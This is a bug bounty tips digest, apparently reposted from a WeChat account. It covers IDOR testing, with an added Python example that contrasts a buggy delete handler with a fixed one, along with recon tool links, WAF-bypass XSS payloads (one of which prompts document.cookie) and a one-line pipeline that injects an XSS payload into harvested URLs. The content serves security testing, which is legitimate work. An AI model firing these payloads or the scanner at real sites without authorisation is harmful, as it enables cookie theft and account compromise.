When testing IDOR on a request that is supposed to alter something (PUT/DELETE/PATCH), receiving a 403 Forbidden response does not necessarily mean the endpoint is not vulnerable to IDOR. Always check the UI as well.
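The failure mode behind that tip, as an added example that is not part of the original digest: a hypothetical delete handler that applies the change before checking object ownership still answers 403, so only the state (the "UI") reveals the IDOR. Both handlers and the sample records are constructed for illustration.

```python
"""Added example: a 403 on PUT/DELETE can hide an IDOR when the side effect
happens before the ownership check. Handlers and data are hypothetical."""
from __future__ import annotations
from dataclasses import dataclass, field


@dataclass
class Store:
    # constructed sample data: two users, each owning one product record
    products: dict = field(default_factory=lambda: {
        101: {"owner": "alice", "name": "Widget"},
        202: {"owner": "bob", "name": "Gadget"},
    })
    audit: list = field(default_factory=list)


def delete_buggy(store: Store, user: str, product_id: int) -> int:
    """Deletes first, authorizes second: the 403 does not reflect reality."""
    record = store.products.pop(product_id, None)
    if record is None:
        return 404
    store.audit.append(f"{user} deleted {product_id}")
    if record["owner"] != user:
        return 403  # client is told 'forbidden', but the record is already gone
    return 204


def delete_fixed(store: Store, user: str, product_id: int) -> int:
    """Authorizes against the object's owner before any side effect, and logs
    the denied attempt so repeated cross-account probes are visible."""
    record = store.products.get(product_id)
    if record is None:
        return 404
    if record["owner"] != user:
        store.audit.append(f"DENIED {user} on {product_id}")
        return 403
    del store.products[product_id]
    store.audit.append(f"{user} deleted {product_id}")
    return 204


def probe(handler) -> tuple[int, bool]:
    """Mimics the tip: send the mutating request as the wrong user, read the
    status code, then 'check the UI' by seeing whether the record still exists."""
    store = Store()
    status = handler(store, "alice", 202)  # alice targets bob's product
    return status, 202 in store.products
```

Both handlers return 403 for the cross-account request; only `delete_fixed` leaves the record in place, which is exactly the difference the status code alone cannot show.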
WPRecon is a tool for vulnerability reconnaissance and blackbox information gathering on WordPress.
https://github.com/AngraTeam/wprecon
Hi Hunters! Here's V1 of my recon methodology, enjoy.
Perhaps the reason you are not finding vulns/bugs is either that your environment is not set up correctly or that your methodology needs improvement. Here are a number of tips to help you with that:
https://www.gnucitizen.org/blog/bug-bounty-tips/
Web application surface testing
File Upload Cheat Sheet
Sunday Funday WAF bypass x3, happy hacking 🙂
"onx+%00+onpointerenter%3dalert(domain)+x"
%2sscript%2ualert()%2s/script%2u
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
A one-line XSS scanner (suited to scenarios without a WAF) [for reflected XSS alone, XRAY is god-tier]
echo url | subfinder -silent | waybackurls | grep "=" | grep -Ev "\.(jpeg|jpg|png|svg|gif|ico|js|css|txt|pdf|woff|woff2|eot|ttf|tif|tiff)" | sed -e 's/=[^?|&]*/=/g' -e 's/=/=xsspayload/g' | sort -u | httpx -silent -probe -ms "xsspayload"
Tip: web app is using REST API? Look for information disclosure.
I inserted a blind XSS payload a few months ago and it was triggered just a few days ago. XSS via the product name field, triggered when the admin website wanted to delete it.
One-sentence translation: blind XSS, never give up!
Planned change to the update schedule: Monday to Friday. Weekend tips may be posted directly in the group chat rather than as a separate article.
Originally published on the WeChat official account (Bug Bounty Tips): Bug Bounty Tips (2022-10-16)